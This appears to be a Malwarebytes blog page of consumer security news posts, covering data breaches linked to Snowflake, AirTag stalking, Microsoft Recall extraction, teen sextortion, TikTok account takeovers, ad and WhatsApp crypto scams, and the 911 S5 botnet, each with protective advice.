It’s nice to see the needle move in the good direction for a change. As Bruce Schneier pointed out in his article Online Privacy and Overfishing:

“Each successive generation of the public is accustomed to the privacy status quo of their youth. What seems normal to us in the security community is whatever was commonplace at the beginning of our careers.”

This has led us all to a world where we don’t even have the expectation of privacy anymore when it comes to what we do online or when using modern technology in general.

If you want to take firmer control over how your location is tracked and shared, we recommend reading How to turn off location tracking on Android.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Advance Auto Parts customer data posted for sale

A cybercriminal using the handle Sp1d3r is offering to sell 3 TB of data taken from Advance Auto Parts, Inc. Advance Auto Parts is a US automotive aftermarket parts provider that serves both professional installers and do it yourself customers.

Allegedly the customer data includes:

  • Names
  • Email addresses
  • Phone numbers
  • Physical address
  • Orders
  • Loyalty and gas card numbers
  • Sales history

The data set allegedly also includes information about 358,000 employees and candidates—which is a lot more than are currently employed by Advance Auto Parts (69,000 in 2023).

The cybercriminal is asking $1.5 Million for the data set.

post by Sp1d3r offering data for sale
Cybercriminal offering Advance Auto Parts data for sale

Advance Auto Parts has not disclosed any information about a possible data breach and has not responded to inquiries. But BleepingComputer confirms that a large number of the Advance Auto Parts sample customer records are legitimate.

Interestingly enough, the seller claims in their post that the data comes from Snowflake, a cloud company used by thousands of companies to manage their data. On May 31st, Snowflake said it had recently observed and was investigating an increase in cyber threat activity targeting some of its customers’ accounts. It didn’t mention which customers.

At the time, everybody focused on Live Nation / Ticketmaster, another client of Snowflake which said it had detected unauthorized activity within a “third-party cloud database environment” containing company data.

The problem allegedly lies in the fact that Snowflake lets each customer manage the security of their environments, and does not enforce multi-factor authentication (MFA).

Online media outlet TechCrunch says it has:

“Seen hundreds of alleged Snowflake customer credentials that are available online for cybercriminals to use as part of hacking campaigns, suggesting that the risk of Snowflake customer account compromises may be far wider than first known.”

TechCrunch also says it found more than 500 credentials containing employee usernames and passwords, along with the web addresses of the login pages for Snowflake environments, belonging to Santander, Ticketmaster, at least two pharmaceutical giants, a food delivery service, a public-run freshwater supplier, and others.

Meanwhile, Snowflake has urged its customers to immediately switch on MFA for their accounts.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your exposure

While the Advance Auto Parts data has yet to be confirmed, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Husband stalked ex-wife with seven AirTags, indictment says

Following their divorce, a husband carried out a campaign of stalking and abuse against his ex-wife—referred to only as “S.K.”—by allegedly hiding seven separate Apple AirTags on or near her car, according to documents filed by US prosecutors for the Eastern District of Pennsylvania.

The documents, unearthed by 404 Media in collaboration with Court Watch, reveal how everyday consumer tools, like Bluetooth trackers, are sometimes leveraged for abuse against spouses and romantic partners.

 “The Defendant continued to adapt and use increasingly sophisticated efforts to hide the AirTags he placed on S.K.’s car,” US attorneys said. “It is clear from the timing of the placement of the AirTags and corroborating cell-site data, that he was monitoring S.K.’s movements.”

On May 8, the US government filed an indictment against the defendant, Ibodullo Muhiddinov Numanovich, with one alleged count of stalking against his ex-wife, S.K.

The stalking at the center of the government’s indictment allegedly began around March 27, when the FBI first learned about S.K. finding and removing an AirTag from her car. Less than a month later, on April 18, the FBI found a second AirTag that “was taped underneath the front bumper of S.K.’s vehicle with white duct tape.”

The very next day, the FBI found a third AirTag. This time, it was “wrapped in a blue medical mask and secured under the vehicle near the rear passenger side wheel well.”

This pattern of finding an AirTag, removing it, and then finding another was punctuated by physical and verbal intimidation, the government wrote. After a fourth AirTag was removed, the government said that Numanovich called S.K., followed her to a car wash, and “banged on her windows, and demanded to know why S.K. was not answering his calls.” Less than one week later, during a period of just 10 minutes, the government said that Numanovich left five threatening voice mails on S.K.’s phone, calling her “disgusting” and “worse than an animal.”

During the investigation, the FBI retrieved seven AirTags in total. Here is where those AirTags were found:

  1. Found by S.K. with no detail on specific location
  2. Duct-taped underneath the front bumper of S.K.’s car
  3. Underneath S.K.’s car, near the passenger-side wheel well, wrapped in a blue medical mask
  4. Within the frame of SK’s driver-side mirror, wedged between the mirror itself and the casing around it
  5. “An opening within the vehicle’s frame” which, documents say, was previously sealed by a rubber plug that was removed
  6. Underneath the license plate on S.K.’s car
  7. Undisclosed

For two of the retrieved AirTags, the FBI deactivated the trackers and then, away from S.K., placed the AirTags at separate locations. At an undisclosed location in Philadelphia where the FBI placed one AirTag, FBI agents later saw Numanovich “exit his vehicle with his phone in his hand, and begin searching for the AirTag.” At a convenience store where the FBI placed a second AirTag, agents said they again saw Numanovich.

The FBI also received information about attempted pairings and successful unpairings with Numanovich’s Apple account for three of the Apple AirTags.

In addition to the alleged pattern of stalking, the government also accused Numanovich of abusing SK both physically and emotionally, threatening her in person and over the phone, and recording sexually explicit videos of her to use as extortion. After a search warrant was authorized on May 13, agents found “approximately 140 sexually explicit photographs and videos of S.K.” stored on Numanovich’s phone, along with records for “numerous” financial accounts that transferred more than $4 million between 2022 and 2023.

In a follow-on request from the government to detain Numanovich before his trial begins, prosecutors also revealed that S.K. may have been brought into the US through a “Russian-based human smuggling network”—a network of which Numanovich might be a member.

According to 404 Media, a jury trial for Numanovich is scheduled to start on June 8.

Improving AirTag safety

Just last month, Apple and Google announced an industry specification for Bluetooth tracking devices such as AirTags to help alert users to unwanted tracking. The specification will make it possible to alert users across both iOS and Android if a device is unknowingly being used to track them. We applaud this development.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Microsoft Recall snapshots can be easily grabbed with TotalRecall tool

Microsoft’s Recall feature has been criticized heavily by pretty much everyone since it was announced last month. Now, researchers have demonstrated the risks by creating a tool that can find, extract, and display everything Recall has stored on a device.

For those unaware, Recall is a feature within what Microsoft is calling its “Copilot+ PCs,” a reference to the AI assistant and companion which the company released in late 2023.

The idea is that Recall can assist users to reconstruct past activity by taking regular screenshots of a user’s activity and storing them, so it can answer important questions like “where did I see those expensive white sneakers?”

However, the scariest part is that Recall does not perform content moderation. It will not hide information such as passwords or financial account numbers and that data may be in snapshots that are stored on your device.

Many security professionals have pointed out that this kind of built-in spyware is a security risk. But Microsoft tried to reassure users, saying:

“Recall data is only stored locally and not accessed by Microsoft or anyone who does not have device access.”

The problem lies in that last part of the statement. Who has device access? Although Microsoft claimed that an attacker would need to gain physical access, unlock the device and sign in before they could access saved screenshots, it turns out that might not be true.

As a warning about how Recall could be abused by criminal hackers, Alex Hagenah, a cybersecurity researcher, has released a demo tool that is capable of automatically extracting and displaying everything Recall records on a laptop.

For reasons any science fiction fan will understand, Hagenah has named that tool TotalRecall.  All the information that Recall saves into its main database on a Windows laptop can be “recalled.“

As Hagenah points out:

“The database is unencrypted. It’s all plain text.”

TotalRecall can automatically find the Recall database on a person’s computer and make a copy of the file, for whatever date range you want. Pulling one day of screenshots from Recall, which stores its information in an SQLite database, took two seconds at most, according to Hagenah. Once TotalRecall has been deployed, it is possible to generate a summary about the data or search for specific terms in the database.

Now imagine an info-stealer that incorporates the capabilities of TotalRecall. This is not a far-fetched scenario because many information stealers are modular. The operators can add or leave out certain modules based on the target and the information they are after. And reportedly, the number of devices infected with data stealing malware has seen a sevenfold increase since 2023.

Another researcher, Kevin Beaumont, says he has built a website where a Recall database can be uploaded and instantly searched. He says he hasn’t released the site yet, to allow Microsoft time to potentially change the system.

According to Beaumont:

“InfoStealer trojans, which automatically steal usernames and passwords, are a major problem for well over a decade—now these can just be easily modified to support Recall.”

It’s true that any information stealer will need administrator rights to access Recall data, but attacks that gain those right have been around for years, and most information stealer malware does this already.

Hagenah also warned that in cases of employers with bring your own devices (BYOD) policies, there’s a risk of someone leaving with huge volumes of company data saved on their laptops.

It is worrying that this type of tools is already available even before the official launch of Recall. The risk of identity theft only increases when we allow our machines to “capture” every move we make and everything we look at.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Financial sextortion scams on the rise

“Hey there!” messaged Savannah, someone 16-year-old Charlie had never met before, but looked cute in her profile picture. She had long blonde hair, blue eyes, and an adorable smile, so he decided to DM with her on Instagram. Soon their flirty exchanges grew heated, and Savannah was sending Charlie explicit photos. When she asked him for some in return, he thought nothing of taking a quick snap of himself naked and sending it her way.

Within seconds, “Savannah” morphed from vixen to vice, threatening Charlie with posting his nude picture all over social media—unless he sent $500. Then she gave Charlie three days to get her the money, otherwise she’d share the compromising photos with his friends and family.

While the above scene is fictional, it’s indicative of what the FBI and Department of Homeland Security agree is the fastest-growing cybercrime of the last three years. It’s called financially motivated sextortion, or financial sextortion, and its victims are mainly teenage boys between the ages of 14 and 17.

Financial sextortion happens when adult criminals create fake accounts posing as young women on social media, gaming platforms, or messaging apps, and coerce victims into sending explicit photos. Scammers then threaten victims into sending payment, usually in the form of cryptocurrency, wire transfer, or gift cards, otherwise they’ll post the images online for all to see.

In an emerging trend, some sextortion scammers are now using artificial intelligence to manipulate photos from victims’ social media accounts into sexually graphic content. The predators then threaten to share the content on public forums and pornographic websites, as well as report victims to the police, claiming they’re in possession of child pornography. Demands for money immediately follow.

In 2023 alone, the National Center for Missing and Exploited Children (NCMEC) received 26,718 reports of financial sextortion of minors, more than double the 10,731 incidents reported in 2022. Sadly, these figures are likely far understated, since they rely on kids or their parents calling in the crime. A January 2024 threat intelligence report from Network Contagion Research Institute (NCRI) found children in the United States, Canada, and Australia are being targeted at an alarming rate, with a massive 1,000 percent surge in financial sextortion incidents in the last 18 months.

To illustrate how quickly the digital landscape has changed, a 2018 national survey found just 5 percent of US teens reported being victims of sextortion. Fast forward to June 2023, and 51 percent of Generation Z respondents said they or their friends were catfished in sextortion scams—47 percent in the last three months.

The Yahoo Boys

Financial sextortion has been linked to scammers in West Africa, particularly Nigeria and the Ivory Coast, as well as the Philippines. However, NCRI notes virtually all sextortion scams targeting minors can be directly linked to a distributed West African gang known as the Yahoo Boys. The Yahoo Boys mainly go after English-speaking minors and young adults on Instagram, Snapchat, and Wizz, an online dating platform for teens. They’re the original Nigerian Princes, but have changed tactics in recent years to elder fraud, romance scams, fake job scams—and now the sexual extortion of children for profit.

NCRI credits the tenfold increase in financial sextortion cases directly to the Yahoo Boys’ distribution of instructional videos and scripts on TikTok, YouTube, and Scribd, which are encouraging and enabling other threat actors to engage in financial sextortion as well. The videos have been viewed more than half a million times, and comments are filled with cybercriminals eager to download the scripts and get started.

The sextortion guides provide step-by-step instructions on how to create convincing fake social media profiles and “bomb” high schools, universities, and youth sports teams. The Yahoo Boys use this term to describe friending/following as many kids in a school or other location as possible to convince victims they could be an unknown classmate or peer from a nearby town.

While the payment amounts requested by the Yahoo Boys vary, they can range from as little as a couple hundred dollars to a few thousand. But predators employ ruthless tactics to intimidate their victims into paying, which can inflict lasting trauma and immense distress on children. Offenders often continue demanding more money after receiving the initial sum and may release victims’ sexually explicit images regardless of whether or not they were paid.

Indeed, the financial fallout may not be as daunting as the millions demanded by ransomware actors, but the emotional cost to teenage boys can be devastating. Anxiety. Humiliation. Shame. Despair. Feeling completely alone and afraid to ask for help. According to the FBI, financial sextortion has even been linked to fatalities. To their knowledge, at least 20 teens between January 2021 and July 2023 committed suicide when faced with the threat of nude photos that could ruin their lives.

What to do if you or your child is financially sextorted

Parents of teenage boys—or all teens for that matter—should have a conversation with their child about the pitfalls of financial sextortion. Remind them to be selective about what they share online and who they connect with, and if a stranger reaches out to them demanding payment or sexually explicit images, they should speak to a trusted adult before sending anything, be it money, photos, or more messages. In fact, open lines of communication can be the difference between life or death, so if your child doesn’t feel comfortable going to you, ask that they bookmark this article or one of the references listed below.

If you or your child are a victim of financially motivated sextortion, the most important advice to remember is this: You are not alone. You are not in trouble. Your child should not be in trouble. There is a way forward after this.

There are several resources you or your child can access to report the crime to law enforcement, speak to a caring counselor or peer, and request that harmful images be taken down. Here’s what we suggest:

  • Block the scammer from contacting you again, but save all chats and profile information because that will help law enforcement identify them.
  • Report the scammer’s account on the platform where the crime took place. Facebook and Instagram parent company Meta unveiled new tools last month to combat financial sextortion, and Snapchat has a reporting feature for nudity or sexual content, which now includes the option: “They leaked/are threatening to leak my nudes.”
  • Report the crime to NCMEC at or directly to the FBI at or the FBI’s Internet Crime Complaint Center (IC3) at FBI Victim Services also has a Child Exploitation Notification Program. Canadian victims can access the Canadian Centre for Child Protection for resources, and report crimes to
  • Seek emotional support, whether from a trusted adult, friend, or through professional services. NCMEC offers assistance for sextortion victims and their families, such as crisis intervention and referrals to local counseling professionals, and their Team Hope volunteer program connects victims to other who’ve experienced financial sextortion.
  • If you prefer a more anonymous support experience, the moderated Reddit forum r/Sextortion is a safe haven for victims to share their experiences and get advice from those who’ve already been through it.
  • Victims looking to remove sexually explicit images from the internet can go to Take It Down for help or Project Arachnid, which uses automated detection methods along with a team of analysts to quickly send removal notices to electronic service providers.
  • Ask for help. Problems from financial sextortion can be complex and require assistance from adults and professionals. If you don’t feel you have adults who can help, reach out to NCMEC at or call 1-800-THE-LOST.

For more information and resources, visit the FBI’s page on financially motivated sextortion.

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Why? Sophisticated hacking tactics and various entry points mean you can’t afford to have blind spots in your protection. A seamless experience across all platforms and devices means you don’t have to figure out more than once about what to do next. We’ve also made it easier to find everything, encouraging you to keep your guard up on all your devices. 

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Why? We know that the distinction between security and privacy is not clear-cut, and you need both products to work together to minimize your exposure (risk of threats and lack of privacy). Integrating the two makes it much easier to protect both your devices and data (at home and on the go), with an easy set-and-forget experience that doesn’t require adding another program.  You shouldn’t have to guess whether the next attack will compromise your Wi-Fi connection, browser, or files through phishing emails, spyware, or malware. Let the technology do this for you.  

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Why? In our recent report, “Everyone’s afraid of the internet, and no one’s sure what to do about it,” we found that only half of the people surveyed felt confident they knew how to stay safe online, and even fewer said they were taking the right measures to protect themselves. Trusted Advisor empowers you with real-time insights, an easy-to-read protection score, and expert guidance that puts you in control of your security and privacy.  We’re by your side guiding you through what to do next to fill your security gaps for each device and platform (Windows, Mac, Android, and iOS).

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Big name TikTok accounts hijacked after opening DM

High profile TikTok accounts, including CNN, Sony, and—er­—Paris Hilton have been targeted in a recent attack.

CNN was the first account takeover that made the news, with Semafor reporting that the account was down for several days after the incident.

According to Forbes, the attack happens without the account owner needing to click on or open anything—known as a zero-click attack. All they need to do is open a Direct Message (DM). The account is then taken over and the user loses access.

Malwarebytes’ Pieter Arntz explained how this sort of attack could happen:

“If they don’t need to click on anything, this could well be a vulnerability in the way content is loaded when opening a DM. We’ve seen similar vulnerabilities before in Chromium browser, for example when fabricated images are loaded.”

TikTok says it has now fixed the issue and is working to get the accounts back to their rightful owners. Spokesperson Alex Haurek told Forbes:

“Our security team is aware of a potential exploit targeting a number of brand and celebrity accounts. We have taken measures to stop this attack and prevent it from happening in the future. “

Haurek didn’t say whether the attackers were still targeting accounts.

Securing your TikTok account

This attack is eye-catching because it’s technically unusual, and was used against people who naturally attract headlines. However, it’s a flash in the pan and the vulnerability was quickly patched.

Meanwhile, there’s a thriving underground market in social logins fuelled with much more successful, but much more mundane forms of attack. To reduce your risk of those, make sure you do these things:

  • Use a strong password to secure your account, and make sure you’ve not used it elsewhere. You can use a password manager to remember your passwords.
  • Enable two-step verification on your account. TikTok tells you how to do that here.
  • Check what devices are logged into your account. TikTok Device Management allows you to view what devices are logged into your account, remove them if needed, and get notified if there is suspicious activity on your account.
  • Be careful what you click on. If you receive a link from someone and you don’t know what it is, don’t click on it. Check via a different communication channel about what the link is. In this case, it appears that someone only had to open a DM in order to get their account taken over so watch out for DMs you’re not expecting.
  • Don’t feel pressure. If someone is messaging you asking you to click on or send them something, think before you do it. Putting pressure on someone to perform an action quickly is a common tactic used by scammers. Trust your instincts.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

US residents targeted by utility scammers on Google

Back in February, we reported on malicious ads related to utility bills (electricity, gas) that direct victims to call centers where scammers will collect their identity and try to extort money from them.

A few months later, we checked and were able to find as many Google ads as before, following very much the same pattern. In addition, we can see that miscreants are trying to legitimize their operations by creating fake U.S.-based entities.

Utility-based ads targeting mobile phones

It only took us 15 minutes to find about a dozen fraudulent ads on Google related to utility bills. This campaign is targeting mobile devices only, as far as we can tell, and U.S. residents. All the ads seen below belong to different advertisers based in Pakistan.

Some of those advertiser accounts have a fairly large footprint with several hundred ads.

Most often, the ad is not associated with a landing page (although a URL is displayed); instead clicking on the ad will bring up the phone number and prompt you to dial. Having said that, the domains used belong to the scammers and are often fairly new.

We also saw several ads that at first appear somewhat legitimate. They are registered to advertisers based in the US and their websites look almost authentic. But when you start checking the details, you realize some things don’t add up, such as an address that leads to an apartment complex.

Consumer protection

The Federal Trade Commission (FTC) has an article about utility scams, however the technique mentioned there is about scammers calling victims, rather than the other way around. For good reason many people won’t answer the phone when it shows an unknown number as it is likely yet another telemarketer. Certainly, there are victims that will answer the phone but the scam is much more effective when you are the one to initiate the call.

We have reported the fraudulent advertiser accounts to Google while we are also adding related domains to our blocklist. Remember to be extremely vigilant before calling anyone, especially if that number came from an advertisement. If in doubt, go directly to your utility company’s website using a computer and then look for a form or phone number that you can verify before dialing.

Indicators of Compromise

Advertiser domains


Phone numbers


Debt collection agency FBCS leaks information of 3 million US citizens

The US debt collection agency Financial Business and Consumer Solutions (FBCS) has filed a data breach notification, listing the the total number of people affected as 3,226,631.

FBCS is a nationally licensed, third-party collection agency that collects commercial and consumer debts, with most of its activity involving the recovery of consumer debts on behalf of creditors. According to the official statement provided by FBCS, the exposed data includes:

  • Full names
  • Social security numbers
  • Birth dates
  • Account information
  • Drivers license or other state ID numbers

In some cases, it also includes medical claims information, provider information, and clinical information (including diagnosis/conditions, medications, and other treatment information), and/or health insurance information.

FBCS has sent data breach notifications to those affected, detailing what data was compromised and offering 12 months of free credit monitoring.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Scan for your exposed personal data

You can check what personal information of yours has been exposed online with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

800 arrests, 40 tons of drugs, and one backdoor, or what a phone startup gave the FBI, with Joseph Cox: Lock and Code S05E12

This week on the Lock and Code podcast…

This is a story about how the FBI got everything it wanted.

For decades, law enforcement and intelligence agencies across the world have lamented the availability of modern technology that allows suspected criminals to hide their communications from legal scrutiny. This long-standing debate has sometimes spilled into the public view, as it did in 2016, when the FBI demanded that Apple unlock an iPhone used during a terrorist attack in the California city of San Bernardino. Apple pushed back on the FBI’s request, arguing that the company could only retrieve data from the iPhone in question by writing new software with global consequences for security and privacy.

“The only way to get information—at least currently, the only way we know,” said Apple CEO Tim Cook, “would be to write a piece of software that we view as sort of the equivalent of cancer.”

The standoff held the public’s attention for months, until the FBI relied on a third party to crack into the device.

But just a couple of years later, the FBI had obtained an even bigger backdoor into the communication channels of underground crime networks around the world, and they did it almost entirely off the radar.

It all happened with the help of Anom, a budding company behind an allegedly “secure” phone that promised users a bevvy of secretive technological features, like end-to-end encrypted messaging, remote data wiping, secure storage vaults, and even voice scrambling. But, unbeknownst to Anom’s users, the entire company was a front for law enforcement. On Anom phones, every message, every photo, every piece of incriminating evidence, and every order to kill someone, was collected and delivered, in full view, to the FBI.

Today, on the Lock and Code podcast with host David Ruiz, we speak with 404 Media cofounder and investigative reporter Joseph Cox about the wild, true story of Anom. How did it work, was it “legal,” where did the FBI learn to run a tech startup, and why, amidst decades of debate, are some people ignoring the one real-life example of global forces successfully installing a backdoor into a company?

The public…and law enforcement, as well, [have] had to speculate about what a backdoor in a tech product would actually look like. Well, here’s the answer. This is literally what happens when there is a backdoor, and I find it crazy that not more people are paying attention to it.

Joseph Cox, author, Dark Wire, and 404 Media cofounder

Tune in today to listen to the full conversation.

Cox’s investigation into Anom, presented in his book titled Dark Wire, publishes June 4.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (
Licensed under Creative Commons: By Attribution 4.0 License
Outro Music: “Good God” by Wowa (

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

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WhatsApp cryptocurrency scam goes for the cash prize

This weekend a scammer tried his luck by reaching out to me on WhatsApp. It’s not that I don’t appreciate it, but trust me, it’s bad for your business.

I received one message from a number hailing from the Togolese Republic.

Scammer sends me login details by WhatsApp intended for "Jay"
WhatsApp message from an unknow sender

“Jay, your financial account has been added. Account Csy926. Password [********] USDT Balance 1,660,086.50 EUR: 592,030.92 [domain] Keep it in a safe place.”

I asked them to send the message in English, pretending not to understand Dutch, but received no reply.

But since it was a rainy day and I’d never seen this type of WhatApp scam before, I decided to investigate.

Sometimes it takes some effort, especially when the domain is blocked for fraud by your favorite security software, but nothing was going to stop me now from looking for my new-found wealth.

Domain blocked by Malwarebytes
Malwarebytes blocked the domain for fraud

To fully understand the message, it’s good to know that USTD stands for Tether, a cryptocurrency referred to as a stablecoin because its value is pegged to a fiat currency. In the case of USTD the fiat currency is the US dollar. The link makes a stablecoin’s value less volatile than that of other cryptocurrencies, which is attractive for traders that like to switch quickly between cryptocurrencies and fiat currencies.

So, I visited the domain which, no surprise there, turned out to be a fake trading platform. I tried the login credentials which were so kindly provided to me.

Login form asking for Account, Password, and an easy verification
Welcome to login

Once logged in I checked my wallet and lo and behold, I’m rich! (Or “Jay” is.)

Wallet belongs to Csy926 who has VIP5 access and contains 1658670.31 USDT or 602,494.07 US$
Nice wallet

The wallet belongs to Csy926 who has VIP5 access and contains 1658670.31 USDT or $602,494.07.

I can either recharge, withdraw, or transfer my USDT tokens or transfer the cold hard cash in dollars. Knowing that in this type of scam the victim always has to invest a—relatively–small amount to get the bait, I knew what to expect.

The easiest way would have been if I could transfer the dollars to a bank account, so I tried that first.

VIP members can transfer assets without KEY
Transfer form

Sadly, there were obstacles:

  • Transfers can only be done to other accounts on the platform and the recipient needs to be at least a VIP1 level.
  • Only VIP members can transfer without a key. Assuming Jay is the one with the key, it’s a good thing that the account has a VIP5 status.

So, to be a recipient of a US$ amount, I’ll need a VIP1 level account on the same platform.

Sadly, that’s not me. So I decided to see what I can do with the USDT tokens.

The form shows a security tip telling users to please fill in your withdrawal account accurately, because assets can not be returned after transfering out. That sucks for Jay.
Withdraw form

The form shows a security tip warning users to fill in their withdrawal account accurately, as assets can’t be returned after transferring them out. That sucks for Jay.

But all in all, that looks promising, but again there are some problems.

  • I’ll need a TRC20 wallet. A TRC20 wallet app is an application, accessible on mobile/web or desktop devices, designed specifically for storing, managing, and engaging with TRC20 tokens.
  • Once I filled out the form and clicked on Withdraw, it turned out I needed a key.
Please enter KEY

Looks like it’s time to read the FAQs. Fortunately, this has the answers to all the “right” questions.

What should I do if I forget my KEY?
What should I do if I forget my KEY?

Long story short. You set the key when you open the account, and it cannot be retrieved. But…..if you have two VIP accounts you can transfer funds from the old account to your new account. And there is no need for a KEY if you have a VIP account. Considering Jay has a VIP5 account there lies an opportunity.

How to activate VIP?
How to activate VIP?

And here comes the catch all of our regular readers saw coming by now, VIP accounts that are able to receive funds cost money. The cheapest—VIP1—requires a deposit of 50 USDT (roughly $50) which is not refundable and can’t be canceled. But with a VIP1 account I can only receive $30 per month and it’s only valid for 2 months. So, that’s not a big help when you are as rich as I am, sorry, Jay is.

Specifics for a VIP1 account
VIP1 account is the lowest level and the cheapest

It would take me until the next ice age—4600 years—to transfer the entire amount at that rate, with the off chance that the rightful owner would drain the account or change the password as soon as they noticed the leak.

Any unsuspecting victim that has come this far and is willing to steal from the treasure dropped in their lap, now realizes that before they can enjoy all that money, they first:

  1. Need to open a new account.
  2. Make a deposit to turn it into a VIP account. The amount depends on their greed and impatience because the higher the VIP level, the larger the amount you can transfer in one day and per month.
  3. Transfer the funds from Jay’s account to their own account.
  4. Set up a TRC20 account.
  5. Withdraw the money from the new account to their TRC20 wallet.

We decided not to sponsor the scammers, so this is as far as we were willing to go, but we have a distinct feeling that along the steps we outlined there might be other fees and deposits needed.

Don’t fall for scammers

  • Any unsolicited WhatsApp message from an unknown person is suspect. No matter how harmless or friendly it may seem. Most pig butchering scams start with what seems a misdirected message.
  • Don’t follow links that reach you in any unexpected way, and certainly not from an untrusted source.
  • If it’s too good to be true, then it’s very likely not true.
  • Scammers bank on the fact that the more time and money you have invested, the more determined you will become to get to the desired end result.
  • Use a web filtering app to shield you from known malicious websites. Preferably Malwarebytes Premium or Malwarebytes Browser Guard.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Ticketmaster confirms customer data breach

Live Nation Entertainment has confirmed what everyone has been speculating on for the last week: Ticketmaster has suffered a data breach.

In a filing with the SEC, Live Nation said on May 20th it identified “unauthorized activity within a third-party cloud database environment containing Company data (primarily from its Ticketmaster L.L.C. subsidiary)” and launched an investigation.

The third party it refers to is likely Snowflake, a cloud company used by thousands of companies to store, manage, and analyze large volumes of data. Yesterday, May 31st, Snowflake said it had “recently observed and are investigating an increase in cyber threat activity” targeting some of its customers’ accounts. It didn’t mention which customers.

In the SEC filing, Live Nation also said:

On May 27, 2024, a criminal threat actor offered what it alleged to be Company user data for sale via the dark web. We are working to mitigate risk to our users and the Company, and have notified and are cooperating with law enforcement. As appropriate, we are also notifying regulatory authorities and users with respect to unauthorized access to personal information.

The user data likely refers to the sales ad for 560 million customers’ data that was posted online earlier this week by a group calling themselves ShinyHunters. The data was advertised for $500,000 and says it includes customer names, addresses, emails, credit card details, order information, and more.

ShinyHunter offering Live Nation / TciketMaster data for sale
Post on BreachForums by ShinyHunters

Bleeping Computer says it spoke to ShinyHunters who said they already had interested buyers, and believed one of the buyers that approached them was Ticketmaster itself.

Ticketmaster says it has begun notifying its users of the breach. We are likely to hear more in the coming days, and will update you as we do.

For now, Ticketmaster users should keep an eye on their credit and bank accounts for an unauthorized transactions and follow our general data breach tips below.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Scan for your exposed personal data

While the Ticketmaster data is yet to be published in full, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

How to tell if a VPN app added your Windows device to a botnet

On May 29, 2024, the US Department of Justice (DOJ) announced it had dismantled what was likely the world’s largest botnet ever. This botnet, called “911 S5,” infected systems at over 19 million IP addresses across more than 190 countries. The main sources of income for the operators, who stole a billions of dollars across a decade, came from committing pandemic and unemployment fraud, and by selling access to child exploitation materials.

The botnet operator generated millions of dollars by offering cybercriminals access to these infected IP addresses. As part of this operation, a Chinese national, YunHe Wang, was arrested. Wang is reportedly the proprietor of the popular service.

